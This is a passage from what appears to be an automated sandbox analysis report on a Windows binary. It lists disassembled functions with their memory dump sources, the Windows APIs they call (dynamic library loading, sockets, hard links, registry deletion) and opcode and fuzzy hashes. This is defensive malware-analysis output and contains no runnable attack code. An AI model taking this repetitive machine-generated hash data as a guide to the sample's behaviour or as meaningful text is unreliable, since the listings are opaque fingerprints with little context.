                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: msctls_trackbar32
                                                                                          • API String ID: 1025951953-1010561917
                                                                                          • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                          • Instruction ID: f066e3482e327e7183b64f667e39acc72e60306169695fb86e446dd2149efa03
                                                                                          • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                          • Instruction Fuzzy Hash: 1F310972A1C685C7E760AF15E458B5AB7A1FB88790F504235DBA803B58DF38D845CF14
                                                                                          Function 00007FF74D09F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                          • String ID: %s%d
                                                                                          • API String ID: 2330185562-1110647743
                                                                                          • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                          • Instruction ID: 79e4155b38dd38280040318ad9c61b9a44d65af2c0069e7d1ecc4df2966aa821
                                                                                          • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                          • Instruction Fuzzy Hash: 42216161B0CB86D1EA14FB16E5442FAA362EB89BC0F944176DEDD07775EE2CE105C720
                                                                                          Function 00007FF74D058782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                          • String ID: csm
                                                                                          • API String ID: 2280078643-1018135373
                                                                                          • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                          • Instruction ID: 912c51abd1900c341b2ffad44eaaec53d0319fb0ac69d0f61969cdc56bf9df92
                                                                                          • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                          • Instruction Fuzzy Hash: EA21093660C641C2E630EF16A45026EB7A1FB85BA5F810625DEDD037A5DF3CE886CB14
                                                                                          Function 00007FF74D0AC110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                          • String ID: 0
                                                                                          • API String ID: 33631002-4108050209
                                                                                          • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                          • Instruction ID: 681fab5c614a24a448819d2f1a58b3f17ded8a7ca7962a5356d4d98c5b7f1fb2
                                                                                          • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                          • Instruction Fuzzy Hash: FA21913661CB80C6D3209F21E48469AB7B4F389794F54422AEBDD03B98DF3CC655CB10
                                                                                          Function 00007FF74D0CAF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D092DD1), ref: 00007FF74D0CAF37
                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D092DD1), ref: 00007FF74D0CAF4F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                          • API String ID: 2574300362-1816364905
                                                                                          • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                          • Instruction ID: e5bf819781697d1fbbdf4225a626ea8ee19df5290bd80a994e03049ce3a9ad71
                                                                                          • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                          • Instruction Fuzzy Hash: 28F09861A1DB06C1EF19FBA1E458364A3A4EB08B09FD40835C99D46374FF7CD5598360
                                                                                          Function 00007FF74D036D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                          • API String ID: 2574300362-3689287502
                                                                                          • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                          • Instruction ID: df06ef131edc200927e2b9ded25fb701fcb431e6f1932d90a25041e85d729806
                                                                                          • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                          • Instruction Fuzzy Hash: 03E0A56590DF0AC2EB15BB61A41836462E4AB08B48FD40835D99946264FFBCE594C250
                                                                                          Function 00007FF74D0D10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                          • API String ID: 2574300362-4033151799
                                                                                          • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                          • Instruction ID: f5e18cf2134e5d2d9d4e84002ca463251b94882fa6cbbb5914412639f9af7e66
                                                                                          • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                          • Instruction Fuzzy Hash: C0E03969A0DB06C1EB09BB21E46832863E0EB08B04F840831C9AC42364FF7CD594C250
                                                                                          Function 00007FF74D0C7634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                          • API String ID: 2574300362-199464113
                                                                                          • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                          • Instruction ID: b8d46ffd7a275c333e32b5f7f1996a02f192d097c28f111d762542461f74bbce
                                                                                          • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                          • Instruction Fuzzy Hash: 53E0C96590DB06C1EF19BB64E81936863A0BB4CB48FD40839D99D46364FF7CD599C210
                                                                                          Function 00007FF74D0A32F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                          • API String ID: 2574300362-192647395
                                                                                          • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                          • Instruction ID: a9c0281bec452307a10d189436463d3fc444ed189b90cf4eb066d458206903ba
                                                                                          • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                          • Instruction Fuzzy Hash: 46E0C96690DB06C2EF15FBA0E45836462A0BB18B48FD40835C9AD46370FFBCD594C220
                                                                                          Function 00007FF74D09B7E4 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                          • Instruction ID: d39f811ab9e3e3a1322286032bfb3f2cdba222d865668b7968430137e78a48d0
                                                                                          • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                          • Instruction Fuzzy Hash: F3D13966B08A55C6EB14EF26C4902AD77B1FB89F98F514462DF8D47B68EF39D840C310
                                                                                          Function 00007FF74D0C79D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                          • Instruction ID: 64ab22fe673d428f613198357279c6c528c5e4e0435a952bfe817087f944ee0e
                                                                                          • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                          • Instruction Fuzzy Hash: EBD12966B0CB41DAEB10FBA5D4901AC73B1FB84B88B804425DE8D57B69EF38E519C390
                                                                                          Function 00007FF74D0DD88C Relevance: 6.1, APIs: 4, Instructions: 134windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                          • String ID:
                                                                                          • API String ID: 1249313431-0
                                                                                          • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                          • Instruction ID: dad5256a31f911bdc36cf8c01fa60903108fde2d3854118c00246ca7a9e298dc
                                                                                          • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                          • Instruction Fuzzy Hash: F451A132A0CA42C6EB60BF25D4906BDB761F744B98F914132DEAD537A4EF79E841C720
                                                                                          Function 00007FF74D0ABAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2267087916-0
                                                                                          • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                          • Instruction ID: c53c8b9a37ffa4bbfd2d03ddf168e5419dfa448fc4c9e81e38c6be637c2a0dbe
                                                                                          • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                          • Instruction Fuzzy Hash: 2E51DE22B1DA11C5EF50BF62D8445ACA3B5BB68B94B944136DE8D537A8EF3CD942C320
                                                                                          Function 00007FF74D0C43C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$socket
                                                                                          • String ID:
                                                                                          • API String ID: 1881357543-0
                                                                                          • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                          • Instruction ID: af9ffb28b56ad5c057ab624fdf969287a2740547b70680cbddfd6dc927b446a0
                                                                                          • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                          • Instruction Fuzzy Hash: 5A418E21B1C682C6DB14FF12A518669A790BB89FE4F844534DE9E5BBA6DF3CE0018750
                                                                                          Function 00007FF74D0B5DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3321077145-0
                                                                                          • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                          • Instruction ID: 4243c87ab8eccec8398791965914eed00cc0ae1e7f38bcd07ca49f57a5908d5f
                                                                                          • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                          • Instruction Fuzzy Hash: 7341B766A0CB46C2DB14FF27D59516DA760FB88FD4B889432DE8E47776EE38E4408360
                                                                                          Function 00007FF74D0DF014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1352109105-0
                                                                                          • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                          • Instruction ID: 164c0ff459b2d1254e6d59f5ff98151a4ca768a73753f46b4fd89bb32726e1ba
                                                                                          • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                          • Instruction Fuzzy Hash: 7A419536A0DA8AC5EA10BF15D894279BBB1BB44B54F958137DEAD43770FF38E4418710
                                                                                          Function 00007FF74D0DAA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                          • String ID:
                                                                                          • API String ID: 3076010158-0
                                                                                          • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                          • Instruction ID: 1a5856a9c29abadcbe718cd95b09ee4f1e6efa42a6beeabb797a49c011a7d644
                                                                                          • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                          • Instruction Fuzzy Hash: E641CC32B0CA45C6EB10EF62D4502AD77A5FB84BA4F944036CE9D13764DF38E842C760
                                                                                          Function 00007FF74D06C72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
